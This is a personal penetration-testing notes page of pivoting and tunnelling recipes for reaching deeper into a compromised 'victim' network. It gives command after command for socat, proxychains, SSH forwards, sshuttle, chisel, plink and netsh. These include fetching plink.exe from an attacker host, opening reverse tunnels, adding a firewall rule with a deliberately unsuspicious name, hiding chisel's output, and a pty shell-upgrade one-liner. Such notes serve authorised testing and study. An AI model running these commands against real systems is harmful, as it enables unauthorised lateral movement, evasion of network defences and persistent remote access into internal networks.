akde/infosec

Information security is ultimately about managing risk

Forwarding, Tunneling and redirections

,

Socat

If Socat is not on the tar­get sys­tem, upload a sta­t­ic bina­ry.

This will lis­ten to port 5555 and for­ward it to the giv­en IP on the giv­en port deep­er in the tar­get’s network:

socat -ddd TCP-LISTEN:5555,reuseaddr,fork TCP:10.4.247.215:5432

Proxychains

! If prox­y­chains is slow, espe­cial­ly while port scan­ning, try to reduce the fol­low­ing parameters:

# Some timeouts in milliseconds
tcp_read_time_out 1500
tcp_connect_time_out 800

Single pivoting

Cre­ate a SOCKS proxy from the attack­er sys­tem to the victim:

ssh -N -D 127.0.0.1:9990 <username>@$victim

Con­fig­ure prox­y­chains to use this SOCKS proxy. In /etc/proxychains.conf, set

socks4 127.0.0.1 9990

Now, prox­y­chain can be prepend­ed to com­mands, which dynam­i­cal­ly redi­rects the pack­ets through the sock proxy. E.g. the fol­low­ing scans with nmap on the vic­tim host:

proxychains nmap -p1-1024 -sT -Pn 127.0.0.1

Tip: Use proxychains3 / proxychains4 if some­thing does­n’t work.

Double pivoting

Cre­ate a SOCKS proxy from the attack­er sys­tem to the victim:

ssh -N -D 127.0.0.1:9990 <username>@$first_victim

Note: If for­ward­ing does­n’t work (all the time), make sure to have

TCPKeepAlive yes
AllowTCPForwarding yes

acti­vat­ed in the sshd_file of the vic­tim SSH server(s)!

Option 0

Use SSH prox­y­Host to con­nect to the first and then to the sec­ond host via one SOCKS proxy. In this case, the prox­y­chains con­fig­u­ra­tion file must have only one socks entry.

ssh -N -D 127.0.0.1:9990 -J $user@$jump_host user@$victim

Option 1

  1. Cre­ate on $first_victim a tun­nel to the $second_victim 
    ssh -N -D 127.0.0.1:9991 -i lr root@$second_victim
  2. Add the sec­ond proxy to the prox­y­chains con­fig­u­ra­tion. 
    socks4 127.0.0.1 9990
    socks4 127.0.0.1 9991

With this option, prox­y­chains works, but the proxy on port 9990 can­not be used to reach tar­gets in the sec­ond net­work. To work with Fire­fox, it has to incap­su­lat­ed with prox­y­chains (and no FF proxy)

MOZ_DISABLE_CONTENT_SANDBOX=1 proxychains4 firefox

Option 2

Unsure if this works | Cre­ate a sec­ond SOCKS proxy on the local system.

proxychains ssh -N -D 127.0.0.1:9991 <username>@$first_victim

Now, prox­y­chain can be used. (See here for source.)

User-compiled proxy server

See local_proxy.go. Change the ports, com­pile it with go build local_proxy.go and upload it.

Netcat

Port forwarding

For­wards port 4444 to 5555 on the same/another system:

ncat -l 4444 --sh-exec "ncat 127.0.0.1 5555"
ncat -l 4444 --sh-exec "ncat 10.4.220.215 5555"

Or just with nc:

mknod mypipe p
nc -l -p 4444 < mypipe | nc 127.0.0.1 22 >mypipe

SSH

For­ward remote port to the local machine:

ssh -L...

For­ward local port on a remote machine to the local machine:

ssh -R...

The net­work lay­out is A -> B -> C -> D.

  • A is my local host
  • B ist the target1 host
  • C is the target2 host.
  • D ist the target3 host.

Scenario 0: Tunnel vom A to A (local port forwarding)

Sce­nario: You need to for­ward pack­ets from port 4444 to 5555 on the same system.

Option 1: Use SSH with localhost:

ssh -N -v -L 127.0.0.1:4444:127.0.0.1:5555 $user@localhost

Option 2: Use Socat:

socat -ddd TCP-LISTEN:4444,reuseaddr,fork TCP:$locaIP:5555

Scenario 1: Tunnel from A to B

On sys­tem A, open a tun­nel which opens local A:5554 which is tun­neled to B:5555:

ssh -N -v -L 127.0.0.1:5554:192.168.10.2:5555 user@192.168.10.2

Scenario 2: Tunnel from B to A

On sys­tem B, open a con­nec­tion to A. This opens A:4141, which can be used to reach B:4444.

ssh -N -R 127.0.0.1:4141:127.0.0.1:4444 naturtrunken@192.168.10.1

Here, the port is on the same sys­tem B.

Scenario 3: Tunnel from B to A to reach C

On sys­tem B, open a con­nec­tion to A. This opens A:4141, which can be used to reach C:4444.

ssh -N -R 127.0.0.1:4141:10.10.1.3:4444 naturtrunken@192.168.10.1

Here, the port is on the remote sys­tem C.

Alter­na­tive: Open to connections:

  1. Reverse con­nec­tion to your own host and in the same command
  2. for­ward con­nec­tion to the next host (could also be localhost).
ssh -v -N -R 127.0.0.1:2222:127.0.0.1:6666 -L 127.0.0.1:6666:192.168.220.7:22 dummy@192.168.45.248

This opens A:2222 -> B:6666->B:6666 -> C:22

Scenario 4: Tunnel from A via A->B->C->D

Pre­req­ui­sites: You have direct access to B and can con­nect from A to B.

On sys­tem B, start SSH lis­ten­er to the out­side (A) which for­wards data to the inter­nal host C, which has a direct con­nec­tion to host D.

ssh -N -v -L 0.0.0.0:5555:$hostD:$targetPortD $user@$hostC

Exam­ple: We are on sys­tem B:

ssh -N -v -L 0.0.0.0:5555:172.16.1.4:445 admin@10.10.1.3

Now we can con­nect from our host A:

smbclient -p 5555 //192.168.10.2/secretdir -U peter --password=Sumer2020

Scenario 5: Tunnel from A to D via A<-B->C->D

Pre­req­ui­sites: You have direct access to B and can con­nect from B to A.

On sys­tem B:

  1. Open a tun­nel on B=(localhost):6666 to D=172.16.1.4:4242 via jumphost C=10.10.1.3:22
    ssh -N -v -L 0.0.0.0:6666:172.16.1.4:4242 database_admin@10.10.1.3
  2. Start a tun­nel from B back to A=192.168.10.1.
    ssh -N -v -R 192.168.10.1:4141:127.0.0.1:6666 naturtrunken@192.168.10.1

Now, you have on your own host A port 4141 lis­ten­ing, which will be routet to host D, port 4242.

Scenario 6: Tunnel from A to D via A->B->C, C->D

Sce­nario: You have direct access to B and C and need to for­ward A:4141 to D:5555.

On sys­tem A:

  • Con­fig­ure prox­y­chains to foward all traf­fic to B:9000 (see above).
  • After all is set up, you can call
    proxychains4 ./myApplication
    which wants access to port D:5555 via local A:4141 via A:proxychains,B:socks,C:SSHtunnel

On sys­tem B:

  • Open a SOCKS proxy port on B:9000 which for­wards all incom­ing traf­fic to C:(all ports, SOCKS).
    ssh -N -D 0.0.0.0:9000 $user@10.10.1.3

On sys­tem C:

  • Open a local port for­ward­ing from C:4141 to D:5555.
    ssh -N -v -L 127.0.0.1:4141:172.16.1.4:5555 $user@localhost
    Note: We can also use local­host to open a port for­ward­ing from C:8080 to C:8081 on the same sys­tem! (If you do not have cre­den­tials for local­host ssh, just use socat, see above)

SOCKS proxy tunneling

Like above, use

ssh -N -D 127.0.0.1:9990 <username>@$victim

to cre­ate a SOCKS tun­nel to anoth­er sys­tem. Now, e.g. per­form a port scan from the remote system:

proxychains nmap --top-ports=20 -sT -Pn 172.16.40.0/24

SSHuttle

SSH-based for­ward­ing of TCP pack­ets on giv­en net­works.

Sce­nario: You want to have access to an inter­nal net­work 10.10.0.0/16 from your own sys­tem via an attacked sys­tem where you have root privileges.

Exam­ple: On your own client:

# sshuttle -r $user@$target:2222 10.10.0.0/16 172.16.219.0/24

This add a local route to both net­works via the tar­get host.

Old­er note:

sshuttle –dns ‑r <target> <network> ‑x <exclude_network> (eg. sshuttle –dns ‑r aklingler01 130.83.0.0/16 ‑x 192.168.0.0/16

Plink

Plink (in /us­r/share/win­dows-bina­ries) can be used on a Win­dows sys­tem behind a fire­wall to open a reverse tun­nel to the attack­ing machine.

Exam­ple 1: Exe­cute this from the remote Win­dows sys­tem. This opens a local port 5555 which can be used to open a RDP connection.

// Upload
powershell wget -Uri http://$attacker/plink.exe -OutFile C:\Windows\Temp\plink.exe
// Reverse shell to an own system with a dummy user/password.
C:\Windows\Temp\plink.exe -ssh -l dummy -pw dummy -R 127.0.0.1:5555:127.0.0.1:3389 192.168.45.248

// For example, open RDP now on your own system.
$ xfreerdp /u:$username /p:$pass /v:127.0.0.1:5555

Exam­ple 2: This com­mand opens a local lis­ten­er which receives pack­ets from all inter­faces (0.0.0.0) on port 4444 and for­wards it to the remote sys­tem 192.168.119.158 on port 4444 via the sys­tem 192.168.119.111.

plink.exe -L 0.0.0.0:4444:192.168.119.158:4444 -N root@192.168.119.111

SSH tunneling via proxy

Via NC

Sce­nario:

  • The attack­er has a use­ful pro­gram on a Win­dows system
  • The Win­dows sys­tem is con­nect­ed to Kali
  • The vic­tim has a con­nec­tion to Kali
  • The Win­dows sys­tem should route pack­ets through Kali to the victim

Attacker1 (with win­dows program)

ssh -L 5938:192.168.57.2:5940 dussel@192.168.57.2

Attacker0 (Kali/has con­nec­tion to the victim)

nc -l -p 5940 -c "nc 127.0.0.1 5939"

Vic­tim (has reverse con­nec­tion to attacker0)

plink-new.exe -v -pw PPPPAAASSS USER@10.10.14.37 -R 5939:localhost:5939

Via SOCKS proxy

You have an open SOCKS proxy (e.g. with chis­el). You want to use SSH over it, which can­not use SOCKS native­ly. Use the Prox­y­Command. This uses a SOCKS proxy via ncat for the SSH client!

ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' $user@$systemC

Note: In this example,

  • A is your sys­tem from which this com­mand is executed,
  • your SOCKS proxy ter­mi­nates on B (e.g. with chis­el) and
  • $sys­temC is here anoth­er sys­tem which is reach­able via the target

Via Meterpreter

You have exploit­ed host A and want to exploit host B, which can only be reached via A.

  1. Start a meter­preter ses­sion on A.
  2. Bring cur­rent ses­sion into the background
  3. Set up a route to B via A
    msf> route add $victimBSubnet $netmask $session_id
  4. Set up the sec­ond exploit normally.

This sets up a route to a net­work via host A.

rinetd

TCP redi­rec­tions (no UDP — no stan­dard FTP!) Define in /etc/rinetd.conf the source address/port and tar­get address/port and restart the service.

Using IPv6 for IPv4-based tools

Sce­nario: You found an open remote port via IPv6 and want to use a tool against it, which does­n’t have IPv6 sup­port or has prob­lems with it.

From Linux

Use the chi­ron proxy (doc­u­men­ta­tion). The fol­low­ing com­mand will cre­ate a proxy lis­ten­er on 127.0.0.3 which can used by all tools to con­nect to the giv­en des­ti­na­tion IPv6 address.

root@imac2019-kali:/opt/Chiron/bin# venv/bin/python2.7 chiron_proxy.py eth0 lo 127.0.0.1 127.0.0.3 -d 2001:a61:5e2:b201:45ae:677a:96cc:aff9

From Windows

1. In the Win­dows tar­get sys­tem as admin­is­tra­tor open a lis­ten­ing port. In this example:

  • Lis­ten on the IPv6 interface
  • Lis­ten on port 80
  • Redi­rect all traf­fic to port 445.
netsh interface portproxy add v4tov6 listenport=445 connectport=80 connectaddress=fe80::...:7636

2. On the attack­er sys­tem, start socat to open a local lis­ten­er which redi­rects all traf­fic to the giv­en IPv6 address and port.

# socat TCP-LISTEN:445,reuseaddr,fork TCP6:[2001:...:7636]:445

3. Start Chi­ron proxy to open a local IPv4 lis­ten­ing port which redi­rects every­thing to the local (socat) IPv6 port. Des­ti­na­tion is the local­host loop­back address.

# venv/bin/python2.7 chiron_proxy.py eth0 lo 127.0.0.1 127.0.0.3 -d fe80::...

4. Now, access is pos­si­ble via local IPv4 tool. Example:

smbclient \\\\127.0.0.3\\share -U joe

With just nc

This lis­tens on 4141 and for­wards all to 5555. Depend­ing on the nc ver­sion, -e could be used instead of ‑c. May not work.

nc -l -p 4141 -c "nc 10.0.0.4 5555"

Windows

In Win­dows, plink.exe (part of the PuT­TY project) can be used to for­ward ports on a remote win­dows sys­tem to a local Kali.

Since 2018, Win­dows con­tains SSH exe­cute­ables in %SYSTEMROOT%\System32\OpenSSH per default.

Local port forwarding with netsh

This needs admin­is­tra­tor privilege.

The fol­low­ing opens a local lis­ten­er on 4141 and for­wards it to the remote host on the same port:

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4141 connectaddress=10.10.10.18 connectport=4141

Check with this com­mand open port forwarding:

netsh interface portproxy show all

(!) After­wards, you may have to open a port in the fire­wall! See the Win­dows Firewall/netsh section.

Example with reverse SSH tunnel and local port forwarding

Sce­nario: You want to access C=10.10.10.5:5555 from A:4141 via Win­dows sys­tem B, where you have admin­is­tra­tor privileges.

  1. Open a reverse SSH tun­nel to open A:4141 which goes to B:4141:
    ssh -N -R 127.0.0.1:4141:127.0.0.1:4141 dummy@$attackerIP
  2. Add port for­ward­ing in an admin­is­tra­tive cmd on the Win­dows sys­tem B:
    netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4141 connectaddress=10.10.10.5 connectport=5555
  3. Open fire­wall on B:
    netsh advfirewall firewall add rule name="port_forward_ssh_or_some_non_suspicous_name_here" protocol=TCP dir=in localip=$ipFromThisSystemB localport=4141 action=allow
  4. Do your stuff
  5. Remove fire­wall hole after­wards:
    netsh advfirewall firewall delete rule name="port_forward_ssh_or_some_non_suspicous_name_here"
  6. Remove port for­ward­ing after­wards:
    netsh interface portproxy del v4tov4 listenport=4141 listenaddress=$ipFromThisSystemB

PowerShell script

Use the fol­low­ing script on a Win­dows sys­tem to start a prim­i­tive port forwarder:

# Define the local listener and the remote endpoint
$localPort = 5555
$remoteHost = "10.10.10.4"
$remotePort = 4444

# Create a TCP listener on the local machine
$listener = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Any, $localPort)
$listener.Start()
Write-Host "Listening on port $localPort..."

while ($true) {
    # Accept incoming client connection
    $client = $listener.AcceptTcpClient()
    $clientStream = $client.GetStream()
    Write-Host "Client connected."

    # Connect to the remote server
    $remoteClient = New-Object System.Net.Sockets.TcpClient
    $remoteClient.Connect($remoteHost, $remotePort)
    $remoteStream = $remoteClient.GetStream()
    Write-Host "Connected to remote $remoteHost:$remotePort."

    # Create buffers for data transmission
    $buffer = New-Object byte[] 1024

    # Forward data from the local client to the remote server
    Start-Job {
        while ($clientStream.DataAvailable) {
            $readBytes = $clientStream.Read($buffer, 0, $buffer.Length)
            $remoteStream.Write($buffer, 0, $readBytes)
        }
    }

    # Forward data from the remote server back to the local client
    Start-Job {
        while ($remoteStream.DataAvailable) {
            $readBytes = $remoteStream.Read($buffer, 0, $buffer.Length)
            $clientStream.Write($buffer, 0, $readBytes)
        }
    }
}

With ncat

Upload ncat.exe from p61-win­dows-bina­ries and see above.

HTTP CONNECT

HTTP con­nect can for­ward requests:

# nc -vvn 192.168.1.130 8888 (UNKNOWN) [192.168.1.130] 8888 (?) open
CONNECT 10.11.1.203:80 HTTP/1.0

HTTP/1.0 200 Connection established
Proxy-agent: tinyproxy/1.8.3

HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1

HTTPtunnel

Assume, you want to access a SSH serv­er on $vic­tim via HTTP. On the attack­er (plays the serv­er role), for­ward incom­ing traf­fic to 8080 to localhost:22.

hts -F localhost:22 8080

On the vic­tim sys­tem, con­nect to the attack­er via port 80 and open local port 3333.

htc -F 3333 $attacker_ip:8080

Now, on the vic­tim, a SSH tun­nel can be build back to the attack­er via

ssh -p3333 localhost

PWnat

https://tools.kali.org/maintaining-access/pwnat

HTTP tunneling with Chisel

Chis­el can tun­nel SSH data via HTTP to evade deep-packed inspec­tion filters.

  1. Pro­vide chis­el for the prop­er archi­tec­ture on HTTP.
  2. Upload the bina­ry on the tar­get, e.g. into /tmp/chisel
  3. Start the serv­er on your own sys­tem
    chisel server --port 8080 --reverse
  4. Start the client on the tar­get
    /tmp/chisel client $ownIp:8080 R:socks > /dev/null 2>&1 &
    If some­thing does not work, make sure to have the same ver­sion on both ends. And, try to get out­put local­ly, see maybe the if then page for redi­rect­ing STDERR and STDOUT to a local net­cat listener.
  5. Use now :1080 als SOCKS proxy port on your sys­tem.
    Some

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';